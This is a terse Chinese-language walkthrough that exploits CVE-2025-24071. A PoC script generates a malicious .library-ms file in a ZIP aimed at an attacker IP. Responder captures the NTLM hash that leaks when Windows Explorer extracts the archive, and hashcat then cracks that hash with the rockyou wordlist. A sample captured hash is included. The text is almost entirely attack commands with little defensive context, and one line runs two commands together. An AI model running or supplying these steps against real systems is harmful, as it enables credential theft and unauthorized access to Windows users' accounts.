sudo apt update && sudo apt install responder -y
启动Responder
sudo responder -I eth0
安装所需Python模块
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
这将生成: testpayload.library-ms testpayload.zip
将testpayload.zip传输到Windows 11测试机。 使用Windows资源管理器解压ZIP文件。 这将触发Windows尝试访问SMB路径,从而泄露NTLM哈希。
responder -I eth0

创建hash.txt文件
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
最常用的rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
